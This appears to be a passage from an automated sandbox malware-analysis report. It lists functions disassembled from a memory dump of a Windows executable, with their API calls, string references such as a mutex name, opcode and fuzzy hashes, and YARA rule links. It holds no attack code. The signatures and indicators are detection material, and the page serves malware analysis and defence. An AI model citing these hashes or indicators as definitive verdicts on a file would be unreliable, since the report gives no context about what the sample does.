Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #3986Menu$#2408#5860#823CountInsertItem
String ID:
API String ID: 3539193034-0
Opcode ID: 3372a8a1f610ac7b88efa834e7e8ad640ea39ee8a1f62d3577203db54cac9e33
Instruction ID: 40f706facd2fdfe3bb8ee1aa8b2ea17ea89fa635033f539b865d83dc8987360b
Opcode Fuzzy Hash: 3372a8a1f610ac7b88efa834e7e8ad640ea39ee8a1f62d3577203db54cac9e33
Instruction Fuzzy Hash: 2B31D631201306AFDB249F61D845BEB7BA5FF44310F01462EBD1692690E7B8D9A0CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 0041CA79, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041CA7E
#823.MFC42(?), ref: 0041CAE3
CreatePalette.GDI32(00000000), ref: 0041CB24
#1641.MFC42(00000000), ref: 0041CB2E
#825.MFC42(00000000,00000000), ref: 0041CB34

Strings

XB, xrefs: 0041CAC5, 0041CACB

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1641#823#825CreateH_prologPalette
String ID: XB
API String ID: 1496229150-1206283037
Opcode ID: 112a48fe678f8261d3474d61a58a74d1d1380447ab7f22950e254b412f3ba268
Instruction ID: 5682b1ff07f19cbbe90439142ed61815294aad32bb5dc18125de851108e13075
Opcode Fuzzy Hash: 112a48fe678f8261d3474d61a58a74d1d1380447ab7f22950e254b412f3ba268
Instruction Fuzzy Hash: 19218C71905218DFDB10DFA9D8C59EEFBB4FF08318BA4816ED005E7242D7399A46CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040162C, Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041BD46
#882.MFC42(?,00000000), ref: 0041BD6E
#882.MFC42(?,?,?,?,00000000), ref: 0041BD82
#882.MFC42(?,?,?,?,?,?,?,00000000), ref: 0041BD96
#879.MFC42(?,00000000), ref: 0041BDC0
#879.MFC42(?,?,?,00000000), ref: 0041BDD5
#879.MFC42(?,?,?,?,?,00000000), ref: 0041BDEA

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #879#882$H_prolog
String ID:
API String ID: 3979785096-0
Opcode ID: 23754bc49887ffe80959d4b5b157114e95f0644b616720dee6c5b38055bb4e9b
Instruction ID: 8321d0028c6a4c29eb6ea48d31a90a143c10616c19efbba5b6600ea2a6d3dadc
Opcode Fuzzy Hash: 23754bc49887ffe80959d4b5b157114e95f0644b616720dee6c5b38055bb4e9b
Instruction Fuzzy Hash: 3111A871600604ABC625FB62E845D7F73BDEFC4718740052FFC4293A51CB3CE905A669

Uniqueness

Uniqueness Score: -1.00%

Function 00401433, Relevance: 10.6, APIs: 7, Instructions: 65fileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00420407
CreateFileMappingA.KERNEL32 ref: 00420433
#800.MFC42 ref: 00420441
MapViewOfFile.KERNEL32(?,00000006,00000000,00000000,00000004), ref: 0042045B
#521.MFC42(?,00000001), ref: 0042046C
UnmapViewOfFile.KERNEL32(00000000), ref: 0042047E
#6307.MFC42 ref: 00420492

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: File$View$#521#6307#800CreateH_prologMappingUnmap
String ID:
API String ID: 1158948252-0
Opcode ID: c868305a8049d8fc227162506ad92db6b29cf95260271956b57a6d17655cc24c
Instruction ID: b3a866acf95f4eedce8cf995ab7db8df16ba03b83de07bd51f54e54c187258c6
Opcode Fuzzy Hash: c868305a8049d8fc227162506ad92db6b29cf95260271956b57a6d17655cc24c
Instruction Fuzzy Hash: 4811B171B00214AFD714AFA4EC85A6EB7B8FB04758F50456AF212E32E1CBB889008658

Uniqueness

Uniqueness Score: -1.00%

Function 00401D61, Relevance: 10.6, APIs: 7, Instructions: 63timewindowCOMMON

Download Yara Rule

APIs

#4299.MFC42(?,?,?,?,00000001), ref: 004212B0
KillTimer.USER32(?,00000010,?,?,?,?,00000001), ref: 004212C2
GetFocus.USER32(?,?,?,?,?,00000001), ref: 004212D2
#2864.MFC42(00000000,?,?,?,?,?,00000001), ref: 004212D9
#6215.MFC42(00000009,00000000,?,?,?,?,?,00000001), ref: 004212E4
#5981.MFC42(00000009,00000000,?,?,?,?,?,00000001), ref: 004212EF
#2379.MFC42(00000009,00000000,?,?,?,?,?,00000001), ref: 004212F6

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2379#2864#4299#5981#6215FocusKillTimer
String ID:
API String ID: 2395187757-0
Opcode ID: ffddd32f552b2a3ca1614a22744a133307eaa5f20b843a4d1b45ae5fab3a288e
Instruction ID: 574c5e50e34c2dc017a8bd2140aa3f428dc38db114026942be974f04551b45f6
Opcode Fuzzy Hash: ffddd32f552b2a3ca1614a22744a133307eaa5f20b843a4d1b45ae5fab3a288e
Instruction Fuzzy Hash: C2116D31300A20DFC625DB29E584A3BB3F1AF84700B90491EF683D3BA5CB39EC418668

Uniqueness

Uniqueness Score: -1.00%

Function 00402185, Relevance: 10.6, APIs: 7, Instructions: 58COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040FD2E
GetSysColorBrush.USER32(0000000F), ref: 0040FD4D
LoadCursorA.USER32 ref: 0040FD5A
#1233.MFC42(00000008,00000000), ref: 0040FD63
#537.MFC42(00000000,00000008,00000000), ref: 0040FD6C
#2124.MFC42(?,?,?,?,?,?,00000000,00000000,00000008,00000000), ref: 0040FDA0
#800.MFC42(?,?,?,?,?,?,00000000,00000000,00000008,00000000), ref: 0040FDB3

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1233#2124#537#800BrushColorCursorH_prologLoad
String ID:
API String ID: 3337878789-0
Opcode ID: 4d7dc7b2052392c82093c9c6f05b52698ad37938432bacbf6bbe6b82b4499562
Instruction ID: fb2db3a3271cd694c6baad7f24bb781f8fccf2eb6ff46da6c32a60cc77efc57c
Opcode Fuzzy Hash: 4d7dc7b2052392c82093c9c6f05b52698ad37938432bacbf6bbe6b82b4499562
Instruction Fuzzy Hash: FC119471A00119ABDB109F96DD46BAFBB78EF90314F10403BF911E72D1C7788914DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041E8EE, Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

#858.MFC42(?), ref: 0041E914
#858.MFC42(?,?), ref: 0041E91F
GetObjectA.GDI32(?,0000003C,?), ref: 0041E934
CreateFontIndirectA.GDI32(?), ref: 0041E944
#1641.MFC42(00000000), ref: 0041E94A
CreateFontIndirectA.GDI32(00000016), ref: 0041E962
#1641.MFC42(00000000), ref: 0041E968

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1641#858CreateFontIndirect$Object
String ID:
API String ID: 3113580872-0
Opcode ID: 257db036cec9143029646e4694a8a5a1a2df77f2780dc751cf3168077c34b753
Instruction ID: 8dad261fe83b189dded91b22710af911f366bf2104460959ff54ce2ce473274b
Opcode Fuzzy Hash: 257db036cec9143029646e4694a8a5a1a2df77f2780dc751cf3168077c34b753
Instruction Fuzzy Hash: 94116075500208EBCB14EF91E885A9A7BB9FF54308F00441EF952672A2DB75B945CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040102D, Relevance: 10.6, APIs: 7, Instructions: 56COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040D2C2
#2011.MFC42(0000806E,?), ref: 0040D2F3
#6068.MFC42(00000000,0000806E,?), ref: 0040D2FB
#537.MFC42(0000806F), ref: 0040D313
#537.MFC42(00008070), ref: 0040D32D
#800.MFC42 ref: 0040D35C
#800.MFC42 ref: 0040D36E

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #537#800$#2011#6068H_prolog
String ID:
API String ID: 3826967766-0
Opcode ID: a9cfd796194533d0e169df707676414219d5b04a1d82dbb8f26c28a2660ef2dd
Instruction ID: 75d558a24e3b75f5fc80e9dc755ea56e544658c5c74a9d6510104530e0897fdf
Opcode Fuzzy Hash: a9cfd796194533d0e169df707676414219d5b04a1d82dbb8f26c28a2660ef2dd
Instruction Fuzzy Hash: 4821E170E006199BDB10DBA4C94ABFEB7B4BF40319F50422EE411772D1CBF82A48CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004014A1, Relevance: 10.6, APIs: 7, Instructions: 53COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040D12F
#535.MFC42(?), ref: 0040D14A
#535.MFC42(?,?,?,?), ref: 0040D160
#2819.MFC42(?,00008067,?,?,?,?,?), ref: 0040D178
#535.MFC42(?,?,?,00008067,?,?,?,?,?), ref: 0040D196
#800.MFC42(00000000,?,?,?,00008067,?,?,?,?,?), ref: 0040D1AB
#800.MFC42(00000000,?,?,?,00008067,?,?,?,?,?), ref: 0040D1B7

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #535$#800$#2819H_prolog
String ID:
API String ID: 2167954325-0
Opcode ID: e211307637b1d43fe90fdc3e4a94f5dec401981ef8b0ea84e80119fa65c3169c
Instruction ID: 9d6747de581eb48175fccc6d0cf0ced1ba660944540de2800a1df285717aa214
Opcode Fuzzy Hash: e211307637b1d43fe90fdc3e4a94f5dec401981ef8b0ea84e80119fa65c3169c
Instruction Fuzzy Hash: 54118270A10258ABCB05DF55D816BEE7BA8AB14318F00814FF452632C2DBB89B14C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 004125AE, Relevance: 10.6, APIs: 7, Instructions: 52stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004125B3
#540.MFC42 ref: 004125C6
lstrlenW.KERNEL32 ref: 004125DE
#1574.MFC42(?,?,00000002), ref: 004125F9
#860.MFC42(00000000,?,?,00000002), ref: 00412602
#535.MFC42(?), ref: 0041260E
#800.MFC42(?), ref: 0041261D

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1574#535#540#800#860H_prologlstrlen
String ID:
API String ID: 3104342797-0
Opcode ID: a9caf953fb915a83924b741f9c49947f30aa0ba6d893364062bf688cc10169a3
Instruction ID: a6d74f2e08db4ea95024fcbdf547c63c93b2f5c25960d15f9053d2bd510a2327
Opcode Fuzzy Hash: a9caf953fb915a83924b741f9c49947f30aa0ba6d893364062bf688cc10169a3
Instruction Fuzzy Hash: D8018E72A1012AABCB10DB94DC46AEF7778EF41308F41441FF401B7241CBB86A44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00420316, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0042031B
#413.MFC42(00000000,00000000,00000000), ref: 0042033B
#413.MFC42(00000000,PJ_Instance_Checker_Mutex,00000000,00000000,00000000,00000000), ref: 00420350
#823.MFC42(0000000C,00000000,PJ_Instance_Checker_Mutex,00000000,00000000,00000000,00000000), ref: 00420361
#521.MFC42(?,00000001,00000000,PJ_Instance_Checker_Mutex,00000000,00000000,00000000,00000000), ref: 00420377

Strings

PJ_Instance_Checker_Mutex, xrefs: 00420344

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #413$#521#823H_prolog
String ID: PJ_Instance_Checker_Mutex
API String ID: 1547391537-1177087269
Opcode ID: 68d9ca2ed107e41dfa5c908877aedfb50277485e4334587db1ef13e6404cb0a0
Instruction ID: 155303779f478b0964fccfda0c54cb574fd3ade86476229bdb87165a2b814a90
Opcode Fuzzy Hash: 68d9ca2ed107e41dfa5c908877aedfb50277485e4334587db1ef13e6404cb0a0
Instruction Fuzzy Hash: 4401D471701264AED724DB6AA945B6FFBF8EF84B04F90406FF045E3281D7F85A448365

Uniqueness

Uniqueness Score: -1.00%

Function 004013D4, Relevance: 10.5, APIs: 7, Instructions: 48COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040E57D
#6199.MFC42(0044217C), ref: 0040E5AD
#2642.MFC42(00000000,0044217C), ref: 0040E5BF
#2642.MFC42(00000000,00000000,0044217C), ref: 0040E5C7
#537.MFC42(00008077,00000000,00000000,0044217C), ref: 0040E5D4
#6199.MFC42(?,00008077,00000000,00000000,0044217C), ref: 0040E5E2
#800.MFC42(?,00008077,00000000,00000000,0044217C), ref: 0040E5EE

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2642#6199$#537#800H_prolog
String ID:
API String ID: 4205915643-0
Opcode ID: f21748cb33225e60186ff439e15b694c2e79e3f033dea034abf3a0834f91070e
Instruction ID: 60a51b4f8ac3b02684fa2e74234a177b9df2c74f0557523aa8a93d39fe6bf4ad
Opcode Fuzzy Hash: f21748cb33225e60186ff439e15b694c2e79e3f033dea034abf3a0834f91070e
Instruction Fuzzy Hash: 7701B572700230ABDF14ABA6DC816BEB661BF84358F91493FE142761C1DB791D12C65C

Uniqueness

Uniqueness Score: -1.00%

Function 0041F82A, Relevance: 10.5, APIs: 7, Instructions: 48COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041F82F
SHGetMalloc.SHELL32(?), ref: 0041F84D
#800.MFC42 ref: 0041F87C
#800.MFC42 ref: 0041F888
#800.MFC42 ref: 0041F894
#800.MFC42 ref: 0041F8A0
#800.MFC42 ref: 0041F8AC

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$H_prologMalloc
String ID:
API String ID: 3811913761-0
Opcode ID: ccde7cec1f0315c518951bffa5591c0bc48536053432ab46c3d22fcfe5fbfb95
Instruction ID: aa9de0cbe87108de1e6a957584a65aac232c0f51a39b3af02b8ce87723e671f7
Opcode Fuzzy Hash: ccde7cec1f0315c518951bffa5591c0bc48536053432ab46c3d22fcfe5fbfb95
Instruction Fuzzy Hash: 3D112370A14651DFC714DF95D049BAEB7F8AF04308F00884EE04697261CBF8AA08CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0041BC61, Relevance: 10.5, APIs: 7, Instructions: 44COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041BC66
#540.MFC42 ref: 0041BC83
#540.MFC42 ref: 0041BC91
#540.MFC42 ref: 0041BC9D
#860.MFC42(00442214), ref: 0041BCB3
#860.MFC42(00442218,00442214), ref: 0041BCC4
#860.MFC42(0044221C,00442218,00442214), ref: 0041BCD4

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #540#860$H_prolog
String ID:
API String ID: 232038355-0
Opcode ID: 8c2c0e69a813f2879e3bfd9dab83dc79bf1d5f1a884ef7312ea3bd6546a8838d
